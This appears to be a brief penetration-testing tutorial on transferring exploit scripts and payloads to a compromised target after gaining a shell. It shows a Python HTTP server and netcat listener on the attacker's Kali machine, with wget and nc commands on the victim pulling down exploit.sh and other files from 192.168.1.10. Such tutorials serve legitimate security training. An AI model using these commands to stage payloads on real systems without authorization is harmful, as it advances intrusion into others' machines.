Moving Tools and Payloads
After getting a shell, you often need to transfer custom exploit scripts, enumerator tools, or large payloads from your Kali machine to the target.
1. Using Python's HTTP Server
This is the fastest and easiest method if the target can reach your machine on a standard HTTP port (80 or 8080).
On Kali (Attacker): Navigate to the directory containing the file, and run:
bash python3 -m http.server 8080
On Target (Victim): Use a tool like curl or wget to download the file:
bash wget http://192.168.1.10:8080/exploit.sh
2. Using Netcat (The Universal File Transfer)
Netcat can be used to pipe data directly across a network socket, regardless of HTTP/FTP restrictions.
Kali (Listener): bash cat file_to_send | nc -lvnp 4444
Victim (Receiver): bash nc 192.168.1.10 4444 > received_file